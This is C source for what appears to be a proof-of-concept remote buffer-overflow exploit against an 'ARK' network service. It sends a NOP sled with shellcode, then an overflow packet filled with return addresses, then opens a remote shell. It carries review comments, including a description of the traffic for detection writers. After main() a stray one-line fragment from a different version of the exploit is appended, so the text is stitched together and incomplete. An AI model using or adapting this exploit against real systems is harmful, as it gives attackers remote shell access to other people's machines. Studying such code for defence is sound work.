/*
 * Entry point of this proof-of-concept client.
 *
 * argv[1] is the target host, argv[2] a 1-based index into the `targets`
 * table. The table, LEN, ARK_PORT, NUMTARGS, NOP_LEN, HEAD_LEN, SHELL_PORT,
 * `shellcode` and the helpers usage(), isock() and getshell() are all defined
 * elsewhere in the file and are not visible here.
 *
 * Observable network behaviour (useful when writing detections for this
 * traffic): two connections to ARK_PORT in quick succession, the first
 * carrying a 0x90-filled payload, the second an 8-byte header whose first
 * two bytes are 0x00 0x4a followed by a LEN-byte body that is mostly 0x90
 * and repeated 4-byte address values; about a second later a third
 * connection is opened to SHELL_PORT.
 *
 * Neither the isock() results nor the write() return values are checked,
 * so a refused connection or a short write is not reported. `host` is only
 * assigned in the argc == 3 branch; the code relies on usage() not returning.
 */
int main( int argc, char **argv) {
    /* first 2 bytes are a type 74 request */
    /* last two bytes length */
    /* 8-byte fixed header; bytes 6-7 are overwritten with the length below */
    char head[] = "\x00\x4a\x00\x03\x00\x01\xff\xff";
    /* NOTE(review): data is 512 bytes but is filled/sent with LEN bytes;
     * requires LEN <= 512 -- LEN is defined outside this view, confirm */
    char data[512];
    char sc_req[20000];
    char *host;
    unsigned int tnum;
    unsigned int safeaddr;
    unsigned int ret;
    int datalen = LEN;
    int port = ARK_PORT;
    unsigned int addr = 0;       /* unused in this function */
    int sock_overflow, sock_nops, sock_shell;
    int i;

    /* Argument parsing: atoi() gives no error indication, so a non-numeric
     * argv[2] becomes 0 and is rejected by the `tnum == 0` test. */
    if (argc == 3) {
        host = argv[1];
        tnum = atoi(argv[2]);
        if (tnum > NUMTARGS || tnum == 0) {
            fprintf(stderr, "[!] Invalid target\n");
            usage(argv[0]);
        }
    } else {
        usage(argv[0]);
    }

    /* Convert the 1-based user index to a table index. */
    tnum--;
    ret = targets[tnum].targret;
    safeaddr = targets[tnum].targsafe;

    /* Two separate connections to the same port; results are not checked. */
    sock_overflow = sock_nops = sock_shell = 0;
    sock_nops = isock(host, port);
    sock_overflow = isock(host, port);

    // build data section of overflow packet
    /* Fill with 0x90, then place `ret` at every 4-byte offset. */
    memset(data, 0x90, datalen);
    for (i = 0; i < datalen; i += 4)
        memcpy(data+i, (char *)&ret, 4);
    // we overwrite a pointer that must be a valid address
    /* `safeaddr` lands 12 bytes before the end of the body. */
    memcpy(data+datalen-12, (char *)&safeaddr, 4);

    // build header of overflow packet
    /* Only the first two bytes of the int are copied, so the bytes that end
     * up in the header depend on host byte order. */
    datalen = ntohs(datalen);
    memcpy(head+6, (char *)&datalen, 2);

    // build invalid packet with nops+shellcode
    /* NOP_LEN+1 bytes of 0x90, with the extra byte then overwritten by the
     * copy of `shellcode` starting at offset NOP_LEN. sizeof(shellcode)
     * presumably includes a trailing NUL if it is a string literal -- cannot
     * confirm from here. */
    memset(sc_req, 0x90, NOP_LEN+1);
    memcpy(sc_req+NOP_LEN, shellcode, sizeof(shellcode));

    // send invalid nop+shellcode packet
    fprintf(stderr, "[*] Sending nops+shellcode\n");
    write(sock_nops, sc_req, NOP_LEN+sizeof(shellcode));
    fprintf(stderr, "[*] Done, sleeping\n");
    sleep(1);
    close(sock_nops);

    // send overflow
    /* Header and body go out as two separate write() calls. */
    fprintf(stderr, "[*] Sending overflow\n");
    write(sock_overflow, head, HEAD_LEN);
    write(sock_overflow, data, LEN);
    fprintf(stderr, "[*] Done\n");
    fprintf(stderr, "[*] Sleeping and connecting remote shell\n");
    sleep (1);
    close(sock_overflow);

    // connect to shell
    /* The "Success" message is printed before anything confirms the
     * connection to SHELL_PORT actually succeeded. */
    sock_shell = isock(host, SHELL_PORT);
    fprintf(stderr, "[*] Success, enjoy\n");
    getshell(sock_shell);
}
unsigned int retaddr; unsigned int safe; int datalen = 0; int port = ARK_PORT; int sock_overflow, sock_nops; int i; int nullmap = 0; sock_overflow = sock_nops = 0; retaddr = targets[tnum].targret; safe = targets[tnum].targsafe; datalen = targets[tnum].len; sock_nops = isock(host, port); if (sock_nops < 1) exit(-1); fprintf(stderr, "[*] Connected to %s:%d NOP+shellcode socket\n", host, port); sock_overflow = isock(host, port); if (sock_overflow < 1) exit(-1); fprintf(stderr, "[*] Connected to %s:%d overflow socket\n", host, port); // build data section of overflow packet memset(data, NOP, DATA_LEN); // copy in return address memcpy(data+datalen - 8, (char *)&retaddr, 4);